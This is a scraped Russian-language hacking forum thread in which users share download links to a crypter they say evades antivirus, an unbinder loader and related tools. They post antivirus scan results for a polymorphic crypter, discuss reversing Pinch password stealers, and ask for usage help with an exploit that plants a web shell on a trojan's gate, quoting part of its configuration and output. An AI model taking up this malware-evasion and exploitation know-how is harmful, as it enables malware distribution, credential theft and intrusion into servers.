расшифровщик (http://depositfiles.com/files/5799367)

плагины к ольге (http://depositfiles.com/files/5796656)

Всё прикольно но в последнем видео а конкретно реверс пинча в конце вы говорите что то про эксплоит Какой именно вы имеете в виду? если можно то сразу ссылочку на него и как использовать.

Не эксплойт, а шелл... На форуме он гдето выкладывался

pohernah109 с kascode.nm.ru не с чем не склееный?
Не с чем, он чист

Не эксплойт, а шелл... На форуме он гдето выкладывался
А можно хоть его название? а то искать каой то шел не зная даже его названия это тоже самое что тыкать пальцем в небо.

Не шелл, а эксплойт, который использует уязвимость в гейте(некорректная проверка на расширение создаваемых файлов) и заливает шелл...

В продолжении темы по расклейке.Когда то ,что то такое в качестве примера накорябала.
Код корявый,но работает.Используется классический перехват апи функций для
ShellExecute и WinExec.Будет работать,если параметр FileName будет содержать полный путь к файлам!Помещаете дллку и ехе в папку с тем файлом который хотите
расклеить,затем открываете его,Loader.exe и в этой папке появляются расклеинные файлы!
Внутри архива исходники,что б потом не говорили что там вирус,так как некоторые
ругаются на Loader.exe как на вирус.Ругаются из за апи функций что находятся в нём!
Так что,компильте фасмом если хотите!
Тестировалось на фрее джойнере.
http://slil.ru/25873972

А ещё можно расклеить путем запуска и в папке темп поглядеть, что выкинулось :))

а если запуск из памяти? :) а хучить лучше всего CreateProcessInternalW.

Вот тоже когда то криптор написала! :) До сих пор большенством непалится!
http://slil.ru/25874452

Не шелл, а эксплойт, который использует уязвимость в гейте(некорректная проверка на расширение создаваемых файлов) и заливает шелл...
а можно ссылочку на него и маленький манульчик как им пользоваться?

пишу криптор на делфи... криптор не палиться всё ништяк... +делает собственный стаб!
он тоже не палиться. начинаю криптовать им и пишет
Heur.rojan.generic
беда..... че можно сделать?

пишу криптор на делфи... криптор не палиться всё ништяк... +делает собственный стаб!
он тоже не палиться. начинаю криптовать им и пишет
Heur.rojan.generic
беда..... че можно сделать?
Обратись к Gloff, он поможет думаю :cool:

Вот тоже когда то криптор написала! :) До сих пор большенством непалится!
http://slil.ru/25874452
Ммм... Палится как троян... =/
Запускать не хочу... :(

Вот тоже когда то криптор написала! :) До сих пор большенством непалится!
http://slil.ru/25874452

поделись исходником для учебных целей....

а можно ссылочку на него и маленький манульчик как им пользоваться?

Пожалуй поддержу просьбу - никогда не пользовался подобными вещами - оч интересно.

и делаем вывод: ААА! да эта же скеяно чем-то !! :)

// ps: хз, а может и нет :)) извините за вирустотал :D гыгы[/QUOTE]

пипец ты так то.... мля скока раз говорили забудь про вирустотал!!!!! млядь скока можно? ЗАБУДЬТЕ ПРО ВИРУСТОТАЛ! ты читал про расклейку посты выше? или тебе делать нех всё подряд кидать в лабы касперскому?????

и делаем вывод: ААА! да эта же скеяно чем-то !! :)

// ps: хз, а может и нет :)) извините за вирустотал :D гыгы

пипец ты так то.... мля скока раз говорили забудь про вирустотал!!!!! млядь скока можно? ЗАБУДЬТЕ ПРО ВИРУСТОТАЛ! ты читал про расклейку посты выше? или тебе делать нех всё подряд кидать в лабы касперскому?????[/QUOTE]

Ой да чо ты ссышь. Стаб почистил и все дела...
Кстати у мну есть акк на авчеке (анлим)

svalck, заткнись лучше ;-D
ChaaK, дай погонять на пару дней ;)

N1k70 всегда такой,лижбы оскорбить когото, по делу пишы.
сорри 4офтоп

Для теста на живность есть виртуалка... Или попросить у народа проверить на вири.... Но не лить на вирустотал.

Lamia за фразу после крипта - зачет =)!

Резы авчек на полиморф 6 уровня =)

AVG 8.0 -
ArcaVir 2008 -
Authentium 4.95.0 -
Avast 4.8.1201 -
Avira 7.8.0.55 -
BitDefender 7.2 -
ClamAV 0.93 -
DrWeb 4.44 -
F-Prot 6.0 -
F-Secure 7.11 -
Kaspersky 7.0.1.325 -
McAfee 5312 -
NOD32 3165 -
Norman 5.92.08 -
Panda 9.04 -
Sophos 4.30 -
Symantec 10.2 -

Полиморф - метаморф

AVG 8.0 -
ArcaVir 2008 -
Authentium 4.95.0 -
Avast 4.8.1201 -
Avira 7.8.0.55 -
BitDefender 7.2 -
ClamAV 0.93 -
DrWeb 4.44 -
F-Prot 6.0 -
F-Secure 7.11 -
Kaspersky 7.0.1.325 -
McAfee 5312 -
NOD32 3165 -
Norman 5.92.08 -
Panda 9.04 -
Sophos 4.30 -
Symantec 10.2 -

Правда крипт убил еву.

П.С. За экранную флудилку тоже зачет =))

если ты так волнуешься за свою безовасность то не качай файлы в которых могут быть вирусы И чужой труд не погань. Люди мучаются чистят пишут с нуля переделывают крипторы а всякие умники вешают его на вирустотал и тем самым не уважая чужой труд... ИМХО

вроде ктото просил видео залит по расклейке фаилов,
вот заливаю.

расклейка (http://depositfiles.com/files/5816502)

реверс пинча (http://depositfiles.com/files/5816516) (или куда идет отчет)

сори если гдето косяк, немного неадекватин был я вчера.
:)

расшифровщик (http://depositfiles.com/files/5799367)

плагины к ольге (http://depositfiles.com/files/5796656)

А что делать если пинч криптованный? :confused: Оооочень надо узнать куда идет отчет от одного пинча...

Тут тебе уже его реверсить надо...

Не шелл, а эксплойт, который использует уязвимость в гейте(некорректная проверка на расширение создаваемых файлов) и заливает шелл...
Присоединяюсь, дайте кто-нить этот эксплойт.

А что делать если пинч криптованный? :confused: Оооочень надо узнать куда идет отчет от одного пинча...
Если реверсить не умееш,то запускаеш на вертуальной машине пинчя,затем скачиваеш себе
Process Explorer вот отсюда:
http://technet.microsoft.com/ru-ru/sysinternals/bb896653(en-us).aspx
Затем запускаеш его тоже на вертуалке,ищеш
процесс пинчя,если он есть
и Properties--->Strings,все текстовые строки в нём!
Затем утилиту от Killerkod для расшифровки
Base64 кодировки.

Chrek625, а то я думаю... почему же тебя забанили на хакнете :-D

Присоединяюсь, дайте кто-нить этот эксплойт.
Кажется я читал что он не работает.
Кто знает так ли это?

Chrek625, а то я думаю... почему же тебя забанили на хакнете :-D
Ну и какова же причина?

Для теста на живность есть виртуалка... Или попросить у народа проверить на вири.... Но не лить на вирустотал.

Lamia за фразу после крипта - зачет =)!

Резы авчек на полиморф 6 уровня =)

AVG 8.0 -
ArcaVir 2008 -
Authentium 4.95.0 -
Avast 4.8.1201 -
Avira 7.8.0.55 -
BitDefender 7.2 -
ClamAV 0.93 -
DrWeb 4.44 -
F-Prot 6.0 -
F-Secure 7.11 -
Kaspersky 7.0.1.325 -
McAfee 5312 -
NOD32 3165 -
Norman 5.92.08 -
Panda 9.04 -
Sophos 4.30 -
Symantec 10.2 -

Полиморф - метаморф

AVG 8.0 -
ArcaVir 2008 -
Authentium 4.95.0 -
Avast 4.8.1201 -
Avira 7.8.0.55 -
BitDefender 7.2 -
ClamAV 0.93 -
DrWeb 4.44 -
F-Prot 6.0 -
F-Secure 7.11 -
Kaspersky 7.0.1.325 -
McAfee 5312 -
NOD32 3165 -
Norman 5.92.08 -
Panda 9.04 -
Sophos 4.30 -
Symantec 10.2 -

Правда крипт убил еву.

П.С. За экранную флудилку тоже зачет =))
Выложи ка .exe где полик 6 уровня,круче по генерации опкодов в level3 я не видел :confused:

я же там криптованый пинч запускал на видео, криптован похер_махом.
если под рукой нет виртуалки то запускаешь пинч предворительно отключив интернет, дальше запускаешь ольгу жмешь аттачить процес выбираешь пинч а после все как в видео ищещ все тексты.вроде все


р.с. зайка и тебя чмок!!!

Тут сплойт от крыса для гейта с описанием: _http://www.xaker.name/forvb/showpost.php?p=33993&postcount=1

Спасибо за ссылку а можно по подробней как им пользоваться Просто я не разу не пользовался эксплоитами((

Ну вот я его загрузил на хост и в строчке
define("GATE_URL", "http://krutik.info/portal/include/admin.php");
вместо http://krutik.info/portal/include/admin.php ввожу адрес гейта например http://**********.freehostia.com/gate/gate.php обращаюсь к нему и он мнен выдаёт IP detected... Send exploit... failed Headers: date: Sat, 07 Jun 2008 18:48:23 GMT server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d SE/0.5.2 connection: close content-type: text/html; charset=iso-8859-1 Server GMT: -14400 Build shell names... Parse dir names... Scanning... Scan 'http://**********.freehostia.com/'...
Что это ? что я сделал не правильно и что мне даёт информация полученая после обращения к сплоиту?

если под рукой нет виртуалки
Виртуалка есть.
запускаешь пинч предворительно отключив интернет
Тут все хитро. Это не совсем чистый пинч. Сначала ты запускаешь некий doc.exe, потом в систему устанавливается сервис kspool.exe. Сервис вырубаем, а этот файлик копируем к себе. Собсно это и есть пинч. Снимаем с него UPX. Ок. Пытаемся его запустить... а вот тут и трабла. пинч сам по себе не запускается! работать он будет только если запущен дроппером doc.exe :(
Ладно. опять запускаем doc.exe, в процессах появляется сервис kspool.exe Пытаемся к нему приатачится... все ок. а дальше что? ничего похожего как на видео нету...

В опциях ольки ставиш сначало
Debugging options,галку на Break on new thread.
Затем Jist-in-time debugging нажимаеш Attach without confirmation,
аттачишся к процессу в деспетчере,затем Alt+E,щёлкаеш по своему модулю.
Затем всё как на видео.

Проблема в том что пинч из-за дроппера грузится с правами System. Вся отладка просто отваливается :(

Пытаемся к нему приатачится... все ок. а дальше что? ничего похожего как на видео нету...
А сам пишеш,что аттачится нормально!
Короче скинь в ПМ,а то тут флейма уже развели немерено!
Может сегодня вечером посмотрю.Может и получится!

Ахтунг! Pohernah палится

Помоиму он всегда палился =))) А после того как пас стал достоянием общественности большее палево стало делом времени.

насчёт всегда не скажу но помоему 9 начал палиться гдето в первую неделю когда начал распространяться пароль на него. А жаль конечно

Ахтунг! Pohernah палится

Чем палится?

Тестил пару дней назад на НОДе, КИСе 7, Др.ВЕБе, Бит Дефендере, вроде не палился.

Чем у тя палится?

Все темы, касаемые Пинч, Ксинч, Трояны, Крипторы, Джойнеры и все что с ними связано закрыты на неопределенный срок.

__